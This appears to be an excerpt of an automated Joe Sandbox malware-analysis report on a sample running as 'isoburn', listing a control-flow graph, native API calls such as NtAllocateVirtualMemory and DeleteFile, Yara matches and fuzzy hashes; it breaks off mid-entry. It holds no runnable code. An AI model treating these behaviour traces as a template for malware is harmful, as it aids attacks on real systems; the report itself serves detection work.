                                                                            control_flow_graph 42 30099c0-3009ee9 43 3009ef3-3009efd 42->43 44 3009f36-3009f3d 43->44 45 3009eff-3009f1a 43->45 46 3009f44-3009f5d 44->46 47 3009f21-3009f23 45->47 48 3009f1c-3009f20 45->48 46->46 51 3009f5f-3009f69 46->51 49 3009f34 47->49 50 3009f25-3009f2e 47->50 48->47 49->43 50->49 52 3009f7a-3009f83 51->52 53 3009f85-3009f97 52->53 54 3009f99 52->54 53->52 56 3009fa0-3009fa7 54->56 57 3009fa9-3009fdc 56->57 58 3009fde-3009fe7 56->58 57->56 59 300a2b5-300a2bc 58->59 60 3009fed-3009ff7 58->60 62 300a2c2-300a2c6 59->62 63 300a3d7-300a3e1 59->63 61 300a008-300a014 60->61 64 300a032-300a035 61->64 65 300a016-300a022 61->65 68 300a2c8-300a2fc 62->68 69 300a2fe-300a317 62->69 66 300a3e3-300a402 63->66 67 300a415-300a41f 63->67 74 300a03b-300a042 64->74 72 300a030 65->72 73 300a024-300a02a 65->73 75 300a413 66->75 76 300a404-300a40d 66->76 70 300a421-300a440 67->70 71 300a452-300a45c 67->71 68->62 69->69 77 300a319 call 3026c40 69->77 78 300a450 70->78 79 300a442-300a44a 70->79 80 300a46d-300a479 71->80 72->61 73->72 82 300a073-300a07d 74->82 83 300a044-300a071 74->83 75->63 76->75 86 300a31e-300a328 77->86 78->67 79->78 87 300a47b-300a48d 80->87 88 300a48f-300a499 80->88 85 300a08e-300a097 82->85 83->74 90 300a0a7-300a0b1 85->90 91 300a099-300a0a5 85->91 89 300a339-300a345 86->89 87->80 93 300a347-300a359 89->93 94 300a35b-300a365 89->94 95 300a0c2-300a0ce 90->95 91->85 93->89 97 300a376-300a37d 94->97 99 300a0d0-300a0dc 95->99 100 300a0de-300a0e8 95->100 101 300a3a6-300a3b0 97->101 102 300a37f-300a3a4 97->102 99->95 103 300a0f9-300a105 100->103 105 300a3c1-300a3ca 101->105 102->97 107 300a107-300a11a 103->107 108 300a11c-300a126 103->108 105->63 109 300a3cc-300a3d5 105->109 107->103 110 300a137-300a143 108->110 109->105 113 300a145-300a157 110->113 114 300a159-300a163 110->114 113->110 115 300a174-300a17d 114->115 117 300a193-300a1a2 115->117 118 300a17f-300a191 115->118 119 300a1a8-300a1b2 117->119 120 300a28b-300a2a4 117->120 118->115 122 300a1c3-300a1cf 119->122 120->120 123 300a2a6-300a2b0 120->123 124 300a1e1-300a1eb 122->124 125 300a1d1-300a1d7 122->125 123->58 128 300a1fc-300a205 124->128 126 300a1d9-300a1dc 125->126 127 300a1df 125->127 126->127 127->122 130 300a215-300a21f 128->130 131 300a207-300a213 128->131 132 300a230-300a239 130->132 131->128 134 300a251-300a258 132->134 135 300a23b-300a244 132->135 138 300a289 134->138 139 300a25a-300a287 134->139 136 300a246-300a24c 135->136 137 300a24f 135->137 136->137 137->132 138->59 139->134
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $$'$,$,i$/$/a$1$2$8W$9$9$@F$DN$E$E$H$H%$L&$N$OW$P$Q$Rf$T$Ut$V$V>$YC$\1$\b$]$]$^$^C$`!$cF$h$ls$m$D$P$a\b
                                                                            • API String ID: 0-2954206845
                                                                            • Opcode ID: c5fc2a4bc53ce5512cacd767ed478470ea0ae4f03f775720f72837c43af1d0e2
                                                                            • Instruction ID: 4f8b4377f635f2a9f8d8f801796c0c888ee034a5f28ae63e2e9749c3fc1dc73c
                                                                            • Opcode Fuzzy Hash: c5fc2a4bc53ce5512cacd767ed478470ea0ae4f03f775720f72837c43af1d0e2
                                                                            • Instruction Fuzzy Hash: 2952AFB0E06629CBEB64CF45C9987DDBBB1BB45308F1081DAD40D6B291C7BA5A89CF44
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0301C280 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindFirstFileW.KERNELBASE(?,00000000), ref: 0301C364
                                                                            • FindNextFileW.KERNELBASE(00000000,00000010), ref: 0301C39F
                                                                            • FindClose.KERNELBASE(00000000), ref: 0301C3AA
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Find$File$CloseFirstNext
                                                                            • String ID:
                                                                            • API String ID: 3541575487-0
                                                                            • Opcode ID: e5a8113a24b97868ad254099b4ce76d3a16e60903e4235b5ab03e4c1fc8c4a56
                                                                            • Instruction ID: 0b5a09e3f1259420c4a5a00f5a5751675beb4e3ccd2cd990b6e663a832574efa
                                                                            • Opcode Fuzzy Hash: e5a8113a24b97868ad254099b4ce76d3a16e60903e4235b5ab03e4c1fc8c4a56
                                                                            • Instruction Fuzzy Hash: A8319275941308BBEB60DB64CC85FFF77BCAF84744F144558B948AB190DA70EA948BA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 03011A10 Relevance: 1.6, Strings: 1, Instructions: 398COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorMode
                                                                            • String ID: ,
                                                                            • API String ID: 2340568224-3772416878
                                                                            • Opcode ID: dd548d637da250e67812eecc5728c5fa8a883e6c5483b14cbb7e266c0dea2505
                                                                            • Instruction ID: 0d04d5939bfcf4f26d2fdd48f651d291e51264f4609c0ae1042c5c77b336852f
                                                                            • Opcode Fuzzy Hash: dd548d637da250e67812eecc5728c5fa8a883e6c5483b14cbb7e266c0dea2505
                                                                            • Instruction Fuzzy Hash: F1E1B1B5D02319ABDB29DFA0DC81FEFB7B8AF84304F044159E609A6141EB70A755CBA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 03024F10 Relevance: 1.6, APIs: 1, Instructions: 87filenativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 03024FD1
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: ac09151ae2de02c380c8794f522cbd0e2a3baa99de870694cad17f0140208203
                                                                            • Instruction ID: ef48759cd0ce8e6d094dc96b676f2cd0b3f3a6f54a5a32fe760f737288920696
                                                                            • Opcode Fuzzy Hash: ac09151ae2de02c380c8794f522cbd0e2a3baa99de870694cad17f0140208203
                                                                            • Instruction Fuzzy Hash: 1C21DCB6201649BFEB44DE98DC80EEB77ADAF8C714F008208FA1997240D670F8518BA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 03025040 Relevance: 1.6, APIs: 1, Instructions: 79filenativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 030250F1
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FileRead
                                                                            • String ID:
                                                                            • API String ID: 2738559852-0
                                                                            • Opcode ID: 9fe8c37de8c01f0ccb16eb15b2b9db5af8fd67254717c0140500df9b126258ef
                                                                            • Instruction ID: 2b60b0ece42122b28634f0a60c80ddd3789bbd2a7796270f19176fdbab62c427
                                                                            • Opcode Fuzzy Hash: 9fe8c37de8c01f0ccb16eb15b2b9db5af8fd67254717c0140500df9b126258ef
                                                                            • Instruction Fuzzy Hash: F621EFB6201609AFDB14DE98DC80EEB77EDAFCC714F04860CFA19A7240D670F8118BA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 030252C0 Relevance: 1.6, APIs: 1, Instructions: 67memorynativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • NtAllocateVirtualMemory.NTDLL(03011A88,?,030121A9,00000000,00000004,00003000,00000004,00000000,030121A9,?,03011A88,030121A9,?), ref: 03025356
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateMemoryVirtual
                                                                            • String ID:
                                                                            • API String ID: 2167126740-0
                                                                            • Opcode ID: 3eabdd7af9bcf2049aa790797242d275fce47b0460ceb6be2fb30c3a51327ec2
                                                                            • Instruction ID: aba58904f2b05714fd882f147a7bfc6f9d317c61f46304e814f45dfe64ff8cbd
                                                                            • Opcode Fuzzy Hash: 3eabdd7af9bcf2049aa790797242d275fce47b0460ceb6be2fb30c3a51327ec2
                                                                            • Instruction Fuzzy Hash: 471113BA201649AFDB14DE98DC80EEB77ADEFC8710F008508FA5897281D670B9118BB5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 03025100 Relevance: 1.5, APIs: 1, Instructions: 47filenativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: DeleteFile
                                                                            • String ID:
                                                                            • API String ID: 4033686569-0
                                                                            • Opcode ID: a676d15123d1633ce15ea626317f44c1822bff9036793ed6d774349b85bba25c
                                                                            • Instruction ID: 5a99900fc631ef7f475acd62617175c5ec299a4588c497ae0f7fbdbfbe13eb13
                                                                            • Opcode Fuzzy Hash: a676d15123d1633ce15ea626317f44c1822bff9036793ed6d774349b85bba25c
                                                                            • Instruction Fuzzy Hash: 78018B762027147EE220EA69CC40FEBB7ADDFC5721F408519FA589B281D770B90087A5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 03025180 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 030251B7
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Close
                                                                            • String ID:
                                                                            • API String ID: 3535843008-0
                                                                            • Opcode ID: 95eb5ec58ed36a9217d741a15508274ea77d94a2defe0925d6dabe828dc0a160
                                                                            • Instruction ID: 1f053629f2219b5a7678fca33a2df4b9517492f3c0b2aec3d85b3a59808348d4
                                                                            • Opcode Fuzzy Hash: 95eb5ec58ed36a9217d741a15508274ea77d94a2defe0925d6dabe828dc0a160
                                                                            • Instruction Fuzzy Hash: 81E04F352117147BD120EA59CC00FD7B7ACEFC6711F408419FA48AB242C671790487F1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 050E4650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4475578362.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: true
                                                                            • Associated: 00000005.00000002.4475578362.0000000005199000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000519D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000520E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_5070000_isoburn.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 342dcf0c302442dd65373a6667547caca20ce1aaf24b8b202c5c01350cc25b30
                                                                            • Instruction ID: 945231967dc61bafc61093a03ae7c9a1454f8ea7e4ffb209e2aec4109f3bfac8
                                                                            • Opcode Fuzzy Hash: 342dcf0c302442dd65373a6667547caca20ce1aaf24b8b202c5c01350cc25b30
                                                                            • Instruction Fuzzy Hash: A09002626015004255407158984444A7015DBE23013D5C115A15545A0C8718C9659379
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 050E4340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4475578362.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: true
                                                                            • Associated: 00000005.00000002.4475578362.0000000005199000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000519D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000520E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_5070000_isoburn.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 846795fe0b596c3cfa70fecbc409e04967f459c6de8e63fb121de1fd4837f86b
                                                                            • Instruction ID: 2269fbc5838d5252834ec5b1dfa1021c46b870e1a9fd1991eb75f41c8e258c8b
                                                                            • Opcode Fuzzy Hash: 846795fe0b596c3cfa70fecbc409e04967f459c6de8e63fb121de1fd4837f86b
                                                                            • Instruction Fuzzy Hash: 5C90023260580012A540715898C458A5015DBE1301B95C011E1424594C8B14CA665371
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 050E2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4475578362.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: true
                                                                            • Associated: 00000005.00000002.4475578362.0000000005199000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000519D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000520E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_5070000_isoburn.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 87c21d124210f5ef82e433f68dbf3d66c0edb5949d5ca3782d02e5b70079a62c
                                                                            • Instruction ID: e1662a9089072eb5f009ad2a6b45c5c98a941978116c8b1f4d6d3d6eb1a368f9
                                                                            • Opcode Fuzzy Hash: 87c21d124210f5ef82e433f68dbf3d66c0edb5949d5ca3782d02e5b70079a62c
                                                                            • Instruction Fuzzy Hash: 4C90022A21340002E5807158A44864E1015CBD2202FD5D415A1015598CCA15C9795331
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 050E2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4475578362.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: true
                                                                            • Associated: 00000005.00000002.4475578362.0000000005199000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000519D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000520E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_5070000_isoburn.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 0622f2fef426d15b69fdec4b2ffb8700621dafb8d69aad77fc690fcb089bfd37
                                                                            • Instruction ID: 261ae397a2fca1df463c87cf3f795a5269f5e07ed419c12ee7e34608c771d90f
                                                                            • Opcode Fuzzy Hash: 0622f2fef426d15b69fdec4b2ffb8700621dafb8d69aad77fc690fcb089bfd37
                                                                            • Instruction Fuzzy Hash: 5890022230140003E5407158A45864A5015DBE2301F95D011E1414594CDA15C9665332
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 050E2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4475578362.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: true
                                                                            • Associated: 00000005.00000002.4475578362.0000000005199000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000519D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000520E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_5070000_isoburn.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 19ef0e55a89f7441c092e23a88d57a233190d200a82b4b3e4e1eff1400e84577
                                                                            • Instruction ID: ce9e1922be04f73b011dab38971aeaecdc1f17fac65e3ae2ded3497a3801370d
                                                                            • Opcode Fuzzy Hash: 19ef0e55a89f7441c092e23a88d57a233190d200a82b4b3e4e1eff1400e84577
                                                                            • Instruction Fuzzy Hash: 13900222242441526945B158944454B5016DBE12417D5C012A2414990C8626D966D731
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 050E2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4475578362.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: true
                                                                            • Associated: 00000005.00000002.4475578362.0000000005199000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000519D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000520E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_5070000_isoburn.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: a6b13045c685fb82c48b870a24af3bd6205b618b5619b3857ecf861eb9310fc4
                                                                            • Instruction ID: 6d819fd8302dbdf4670ba3bffbc120386d0406f24a746797ef734c4cd8847fdd
                                                                            • Opcode Fuzzy Hash: a6b13045c685fb82c48b870a24af3bd6205b618b5619b3857ecf861eb9310fc4
                                                                            • Instruction Fuzzy Hash: EB90023220140413E5117158954474B1019CBD1241FD5C412A1424598D9756CA62A231
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 050E2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4475578362.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: true
                                                                            • Associated: 00000005.00000002.4475578362.0000000005199000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000519D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000520E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_5070000_isoburn.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 486d76907112e167417b032ff846b157066739cb3011b43cf77ffd09d8d131bd
                                                                            • Instruction ID: 66d365469b12a1b1815ca19060db635d5015adcc3c3ce922f417b4b786128aca
                                                                            • Opcode Fuzzy Hash: 486d76907112e167417b032ff846b157066739cb3011b43cf77ffd09d8d131bd
                                                                            • Instruction Fuzzy Hash: 5390023220140842E50071589444B8A1015CBE1301F95C016A1124694D8715C9617631
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 050E2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4475578362.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: true
                                                                            • Associated: 00000005.00000002.4475578362.0000000005199000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000519D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000520E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_5070000_isoburn.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: b10d1c61d3155084374b100d317b90c27d3be6be58f40b35dfd649bbcce2d60d
                                                                            • Instruction ID: 481cbdcf3a191b4d3df405218586de78dd7e91373f1cc95a8d058fc13a8acfc2
                                                                            • Opcode Fuzzy Hash: b10d1c61d3155084374b100d317b90c27d3be6be58f40b35dfd649bbcce2d60d
                                                                            • Instruction Fuzzy Hash: C490023220148802E5107158D44478E1015CBD1301F99C411A5424698D8795C9A17231
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 050E2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4475578362.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: true
                                                                            • Associated: 00000005.00000002.4475578362.0000000005199000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000519D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000520E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_5070000_isoburn.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 12a8e0851b5312ba807860fab944178a7db8d2530b54d1305af48e9e8ee346f4
                                                                            • Instruction ID: abb266ca2c58e524d92c222c8d7bf9fe3d281474453f4aca2358f9a356d472a5
                                                                            • Opcode Fuzzy Hash: 12a8e0851b5312ba807860fab944178a7db8d2530b54d1305af48e9e8ee346f4
                                                                            • Instruction Fuzzy Hash: 1590023220140402E5007598A44868A1015CBE1301F95D011A6024595EC765C9A16231
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 050E2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4475578362.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: true
                                                                            • Associated: 00000005.00000002.4475578362.0000000005199000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000519D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000520E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_5070000_isoburn.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 77e0782e6711aaf259ba097507bbc033453bd84aa3acec47b05b737d415d01ae
                                                                            • Instruction ID: 488703e6c7aa1a6314eb6c67a0ffa982ef14a3c7866d19b64036c87627130a84
                                                                            • Opcode Fuzzy Hash: 77e0782e6711aaf259ba097507bbc033453bd84aa3acec47b05b737d415d01ae
                                                                            • Instruction Fuzzy Hash: 5290026234140442E50071589454B4A1015CBE2301F95C015E2064594D8719CD626236
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 050E2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4475578362.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: true
                                                                            • Associated: 00000005.00000002.4475578362.0000000005199000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000519D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000520E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_5070000_isoburn.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: abfe70294b12afecd843e778cb5c13d60b59313f9fd462bc10a1a877c34f8dab
                                                                            • Instruction ID: f6aa4efe6a2930b8dfc5a1d61ede5080b14f657b043de4ead1351705663e2580
                                                                            • Opcode Fuzzy Hash: abfe70294b12afecd843e778cb5c13d60b59313f9fd462bc10a1a877c34f8dab
                                                                            • Instruction Fuzzy Hash: 1D9002226014004255407168D88494A5015EFE2211795C121A1998590D8659C9755775
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 050E2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4475578362.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: true
                                                                            • Associated: 00000005.00000002.4475578362.0000000005199000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000519D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000520E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_5070000_isoburn.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: ea234dc435d267115da20d0e1c2747538ed711d5247463e076d3a8dae9b78b4c
                                                                            • Instruction ID: 7c54047682c2f7e8231178ac727788b962a67f95fc994f34e67751080ff3cdad
                                                                            • Opcode Fuzzy Hash: ea234dc435d267115da20d0e1c2747538ed711d5247463e076d3a8dae9b78b4c
                                                                            • Instruction Fuzzy Hash: EB900222211C0042E60075689C54B4B1015CBD1303F95C115A1154594CCA15C9715631
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 050E2E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4475578362.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: true
                                                                            • Associated: 00000005.00000002.4475578362.0000000005199000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000519D000.00000040.00001000.00020000.00000000.sdmpDownload File
